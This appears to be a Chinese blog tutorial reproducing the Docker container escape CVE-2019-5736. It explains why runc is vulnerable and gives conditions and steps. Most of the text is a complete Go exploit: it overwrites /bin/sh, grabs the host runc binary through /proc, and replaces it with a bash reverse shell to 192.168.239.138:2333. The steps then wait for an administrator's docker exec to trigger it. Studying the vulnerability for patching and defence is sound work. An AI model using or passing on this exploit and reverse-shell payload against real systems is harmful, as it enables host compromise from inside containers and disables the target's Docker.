Docker逃逸"/>
Docker逃逸
一、产生原因
Docker执行命令时,先向镜像管理的containerd发送gRPC请求,containerd收到请求后,再发送给具体的容器管理containerd-shim,shim根据OCI协议将命令发送给runc执行,所以实际上执行命令的是runc
漏洞大概意思是:/proc/[PID]/exe这个链接文件的指向是该进程的二进制文件,而在runc exec加入到容器的命名空间之后, 容器内进程已经能够通过内部/proc观察到它,通过遍历/proc目录,此时我们可以拿到runc在宿主机上的二进制文件路径,然后用恶意代码覆盖runc二进制文件
然后等待管理员执行docker exec命令,但由于该漏洞需要重写runc二进制文件,故漏洞利用完会造成目标docker无法使用
二、利用条件
1、docker-runc版本不能高于1.0-rc6,docker 版本在18.09之前
2、容器以root权限运行
三、复现过程
1、环境搭建
docker和runc版本如下
下载docker环境脚本并运行
curl -o install.sh && bash install.sh2、下载POC,修改脚本
git clone 下载不了可以复制下面代码
package main// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
//
import ("fmt""io/ioutil""os""strconv""strings""flag"
)var shellCmd stringfunc init() {flag.StringVar(&shellCmd, "shell", "", "Execute arbitrary commands")flag.Parse()
}func main() {// This is the line of shell commands that will execute on the hostvar payload = "#!/bin/bash \n bash -c 'bash -i >& /dev/tcp/192.168.239.138/2333 0>&1'" + shellCmd// First we overwrite /bin/sh with the /proc/self/exe interpreter pathfd, err := os.Create("/bin/sh")if err != nil {fmt.Println(err)return}fmt.Fprintln(fd, "#!/proc/self/exe")err = fd.Close()if err != nil {fmt.Println(err)return}fmt.Println("[+] Overwritten /bin/sh successfully")// Loop through all processes to find one whose cmdline includes runcinit// This will be the process created by runcvar found intfor found == 0 {pids, err := ioutil.ReadDir("/proc")if err != nil {fmt.Println(err)return}for _, f := range pids {fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")fstring := string(fbytes)if strings.Contains(fstring, "runc") {fmt.Println("[+] Found the PID:", f.Name())found, err = strconv.Atoi(f.Name())if err != nil {fmt.Println(err)return}}}}// We will use the pid to get a file handle for runc on the host.var handleFd = -1for handleFd == -1 {// Note, you do not need to use the O_PATH flag for the exploit to work.handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)if int(handle.Fd()) > 0 {handleFd = int(handle.Fd())}}fmt.Println("[+] Successfully got the file handle")// Now that we have the file handle, lets write to the runc binary and overwrite it// It will maintain it's executable flagfor {writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)if int(writeHandle.Fd()) > 0 {fmt.Println("[+] Successfully got write handle", writeHandle)fmt.Println("[+] The command executed is" + payload)writeHandle.Write([]byte(payload))return}}
}改为要反弹的主机和端口
这里把编译好的main复制到容器内执行,模拟攻击者
go build -o main main.go
docker cp main 33c6927d312d:/tmp3、执行脚本,然后等待管理员执行命令,反弹shell
容器内运行脚本 ./main
模拟管理员执行exec命令
攻击机监听,成功反弹宿主机shell
更多推荐
Docker逃逸
发布评论